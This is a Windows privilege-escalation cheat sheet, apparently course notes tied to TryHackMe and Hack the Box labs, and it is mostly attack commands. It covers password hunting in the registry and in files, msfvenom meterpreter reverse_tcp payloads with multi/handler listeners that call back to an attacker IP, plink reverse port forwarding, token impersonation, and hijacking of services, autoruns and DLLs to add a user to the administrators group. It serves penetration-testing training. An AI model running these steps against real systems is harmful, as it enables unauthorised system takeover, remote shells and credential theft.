Windows Privilege Escalation

For this we need to be in network like any kind of shell.

Resources:

  1. Fuzzy Security Guide - https://www.fuzzysecurity.com/tutorials/16.html

  2. PayloadsAllTheThings Guide - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

  3. Absolomb Windows Privilege Escalation Guide - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

  4. Sushant 747's Guide (Country dependant - may need VPN) - https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html

  5. Please see the attached link for a list of all resources used in the course. A very special thanks goes to Grimmie for putting this together! <3

    https://github.com/Gr1mmie/Windows-Priviledge-Escalation-Resources

Initial Enumeration

#System Enumeration
systeminfo
systeminfo | findstr /b /c:"OS Name" /c:"OS Versoin" /c:"System Type"
wmic qfe
wmic qfe Caption,Description,HotFixID,InstalledOn
wmic logicaldisk
wmic logicaldisk get caption,description,providername
wmic logicaldisk get caption

#User Enumeration
whoami
whoami /priv
whoami /groups
net user    #to view users on this machine
net user <username>
net localgroup
net localgroup <group_name>

#Network Enumeration
ipconfig
ipconfig /all
arp -a
route print
netstat -ano

#Password Hunting
findstr /si password *.txt
findstr /si password *.txt *.ini *.config

#AV Enumeration
sc query windefend
sc queryex type=service
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config

Automated Tool for Enumeration

#WinPEAS - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
#Winpeas - https://github.com/carlospolop/PEASS-ng/releases/tag/20230129
#Windows PrivEsc Checklist - https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation
#Sherlock - https://github.com/rasta-mouse/Sherlock
#Watson - https://github.com/rasta-mouse/Watson
#PowerUp - https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
#JAWS - https://github.com/411Hall/JAWS
#Windows Exploit Suggester - https://github.com/AonCyberLabs/Windows-Exploit-Suggester
#Metasploit Local Exploit Suggester - https://blog.rapid7.com/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more/
#Seatbelt - https://github.com/GhostPack/Seatbelt
#SharpUp - https://github.com/GhostPack/SharpUp
#Download the WinPEAS and place it in victim machine then run it
winPEASany.exe
#Run in meterpreter session
pwd
cd c:\\windows\\tmp
upload WinPEAS.exe    #Winpeas need to dowloaded in attacker mechine
#now will move to windows
shell    #(or) load powershell
#running winpeas
WinPEAS.exe
#Opening powershell via CMD
powershell -ep bypass

#using exploit_suggester metasploit, it will give you info about kernal exploits and save those for exploitation
post/multi/recon/local_exploit_suggester

#using exploit_suggester github
#https://github.com/AonCyberLabs/Windows-Exploit-Suggester
#downlaod it and run it
./windows-exploit-suggester.py --update
pip install xlrd --upgrade    #if any error accours try: curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py; python get-pip.py
./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txt    #here systeminfo.txt is system info of victim 
#It will give you info about kernal exploits and save those for exploitation

Kernel Exploits

#Windows Kernel Exploits - https://github.com/SecWiki/windows-kernel-exploits
#Using Metasploit
#Use the kernal exploits we got from previous technique and try exploit using different exploits that we got previously
#Try one exploit different time and you will get shell
getuid    #to know privilages in meterpreter ex:NT authority
whoami    #to know privilages in windows ex:NT authority

#Using Manual
#Use the kernal exploits we got from previous technique and try exploit using different exploits that we got previously
#we need check different reposotories for more good usage info
#EX: Churraskito_exe <ip_add_of_attaker> <attacker_port>    #we need have netcat listener on attacker machine while running this

Passwords and Port Forwarding

#Check for passwords stored
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

#Port forwarding t communicate to internal network open ports
#Plink Download - https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
#Download the plink and place it in victim windows machine using http.server and curtutil
service ssh start    #attacker machine
plink.exe -l root -pw toor -R 445:127.0.0.1:445 10.10.x.x    #victim machine
#now to check portforward completed use 
netstat -ano | grep 445
#If we have credentials we connect using winexe
winexe -U Administrator%Welcome1! //127.0.0.1 "cmd.exe"
#now we can connect to 445 using attacker machine IP, using like psexec.py

Windows Subsystem for Linux

#https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
#Escalation via WSL
where /R C:\windows bash.exe
where /R C:\windows wsl.exe
bash.exe
#spawning tty shell
#just google spawning tty shell cheet sheet
#https://rcenetsec.com/shell-spawning/
history
psexec.py marvel.local/fcastle:Password1@192.168.x.x
#or
smbexec.py marvel.local/fcastle:Password1@192.168.x.x
#or
wmiexec.py marvel.local/fcastle:Password1@192.168.x.x
#Note: start with smbexec -> wmiexec -> psexec

Impersonation and Potato Attacks

#https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#eop---impersonation-privileges
#potato attacks
#Rotten Potato - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/
#Juicy Potato - https://github.com/ohpe/juicy-potato
whoami /priv    #note SeImporsonatePrivillage enbled we can do this attack, see above links for more info
#Token Impersonation with Incognito
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
shell
whoami
#If any error accours try this command
rev2self

#Alternate Data Streams
#Alternate Data Streams - https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/
dir /R
more < <file_name>

getsystem

#What happens when I type getsystem? - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
#Run in meterpreter session
getsystem
getsystem -h

RunAs

cmdkey /list
C:\Windows\System32\runas.exe /user:ACCESS:Administartor /savecred "C:\Windows\System32\cmd.exe /c TYPE C:\Administartor\Desktop\root.txt > C:\Users\security\root.txt"

Registry

#https://www.aldeid.com/wiki/TryHackMe-Windows-PrivEsc-Arena
#Enumearte Autoruns
#powerup (bestone)
. .\PowerUp.ps1    #Run on powershell
Invoke-AllChecks
#autorun
#Download sysintersuite and run autorun.exe tool
Autorun64.exe
#access check
accesschk.exe -wvu "C:\Program Files\Autorun Program"

#Escalation via Autorun
#Now create a msfvenom paylaod 
msfvenom windows/meterpreter/reverse_tcp lhost=10.10.x.x -f exe -o program.exe
#Now listen on attacker machine
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp # has to be exactly the same!
set lhost 10.10.x.x
set lport 443
run
#now replace the original program with payload, using http.server
#when programs runs as administrator, we will get administrator privillages shell

#AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer    #From the output, notice that “AlwaysInstallElevated” value is 1.
reg query HKCU\Software\Policies\Microsoft\Windows\Installer    #From the output, notice that “AlwaysInstallElevated” value is 1.
Write-UserMSI    #This is from powerup, where abusefunction is mentioned
#Now run the add user file created in powerup folder to create a user
#Anotherway
#Create a msfvenom paylaod 
msfvenom windows/meterpreter/reverse_tcp lhost=10.10.x.x -f msi -o setup.msi
#Now listen on attacker machine
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp # has to be exactly the same!
set lhost 10.10.x.x
set lport 443
run
#Anotherway
use exploit/windows/local/always_install_elevated 
session 1
run

#regsvc ACL (need more clarity and need to complete steps)
Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl    #Notice that the output suggests that user belong to “NT AUTHORITY” has “FullContol” permission over the registry key.
#Exploiting
#Copy ‘C:\Users\User\Desktop\Tools\Source\windows_service.c’ to the Kali VM
pip3 install pyftpdlib
python -m pyftpdlib -p 21 --write
#Now run below command in powershell
ftp 10.10.x.x
put windows_service.c
#Now replace whoami command with below command
cmd.exe /k net localgroup administrators user /add
#Now compile this file
apt install gcc-mingw-w64
x86_64-w64-mingw32-gcc windows_service.c -o x.exe
#Place x.exe in C:\Temp
#Run below command in cmd
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
sc start regsvc
#To check user was added use below command
net localgroup administrators

Executable Files

#https://www.aldeid.com/wiki/TryHackMe-Windows-PrivEsc-Arena
#Enumeration
#powerup (bestone)
. .\PowerUp.ps1    #Run on powershell
Invoke-AllChecks
#Open command prompt and type: 
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
#Notice that the “Everyone” user group has “FILE_ALL_ACCESS” permission on the “filepermservice.exe” file.

#Exploitation
#place the x.exe file previously generated in victim machine with name filepermservice.exe
#save the file in "c:\Program Files\File Permissions Service\filepermservice.exe" and run below command
sc start filepermsvc
#To check user was added use below command
net localgroup administrators

Startup Applications

#https://www.aldeid.com/wiki/TryHackMe-Windows-PrivEsc-Arena#[Task_6]_Service_Escalation_-_Executable_Files
#icacls Documentation - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls
#Enumeration
where /R C:\windows icacls.exe
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
#From the output notice that the “BUILTIN” group has full access ‘(F)’ to the directory.

#Exploitation
#Start listen
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost [Kali VM IP Address]
run
#Generate a payload 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe
#now place this file in victim machine
#Place x.exe in C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup.
#Logoff and Login with the administrator account credentials then you will get the shell

DLL Hijacking

#open Procmon and and configure filters as shown below
#Process Name : is : dllsvc
#path : ends with : .dll
#Result : is : NAME NOT FOUND
#Now run below commands
sc stop dllsvc
sc start dllsvc
#you can notice few paths in process monitor which can be exploited

#Exploiting
#Copy ‘C:\Users\User\Desktop\Tools\Source\windows_service.c’ to the Kali VM
pip3 install pyftpdlib
python -m pyftpdlib -p 21 --write
#Now run below command in powershell
ftp 10.10.x.x
put windows_service.c
#Now replace whoami command with below command
cmd.exe /k net localgroup administrators user /add
#Now compile this file
apt install gcc-mingw-w64
x86_64-w64-mingw32-gcc windows_service.c -o x.exe
#Now place the file in victim machine in the path we got in procmon
#now stop and start the service again
sc stop dllsvc
sc start dllsvc

Service Permissions (Paths)

#https://www.aldeid.com/wiki/TryHackMe-Windows-PrivEsc-Arena#[Task_6]_Service_Escalation_-_Executable_Files

#Escalation via Binary Paths
#Enumeration
#powerup (bestone)
. .\PowerUp.ps1    #Run on powershell
Invoke-AllChecks
#Manual Enumeration
accesschk64.exe -wuvc everyone *
accesschk64.exe -wuvc <name>    #EX: accesschk64.exe -wuvc daclsvc
#Notice that the output suggests that the user “User-PC” has the “SERVICE_CHANGE_CONFIG” permission.
#Exploitation
sc qc <name>    #sc qc daclsvc
sc config <name> binpath="net localgroup administrators user /add"    #sc config daclsvc binpath="net localgroup administrators user /add"
sc start <name>    #sc start daclsvc
#To check user was added use below command
net localgroup administrators

#Escalation via Unquoted Service Paths
#Enumearation
#powerup (bestone)
. .\PowerUp.ps1    #Run on powershell
Invoke-AllChecks
#Manual Enumeration
sc qc unquotedsvc
#Exploitation
#Start listen
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost [Kali VM IP Address]
run
#Generate a payload 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o common.exe
#Place common.exe in C:\Program Files\Unquoted Path Service
#Open command prompt and type: 
sc start unquotedsvc
#To check user was added use below command
net localgroup administrators
#steel mountain tryhackme walkthrough
#https://systemweakness.com/steel-mountain-tryhackme-walkthrough-552021de9159

#CVE-2019-1388
#Zero Day Initiative CVE-2019-1388 - https://www.youtube.com/watch?v=3BQKpPNlTSo
#Blaster walkthrough -TryHackMe
#https://infosecwriteups.com/blaster-walkthrough-tryhackme-f44f0adb6814?gi=bbc617d1436c

#Capstone
#Hack the Box (HTB) machines walkthrough series — Arctic
#https://resources.infosecinstitute.com/topic/hack-the-box-htb-machines-walkthrough-series-arctic/
#HTB Bastard Walkthrough
#https://systemweakness.com/htb-bastard-walkthrough-144d895da08e
#TryHackMe — Alfred Walkthrough
#https://clarencesubia.medium.com/tryhackme-alfred-walkthrough-6c8823b72d02
#Hack the Box (HTB) machines walkthrough series — Bastion
#https://resources.infosecinstitute.com/topic/hack-the-box-htb-walkthrough-bastion/
#Querier HackTheBox Walkthrough
#https://www.hackingarticles.in/querier-hackthebox-walkthrough/
PreviousPrivilege EscalationNextLinux Privilege Escalation

Last updated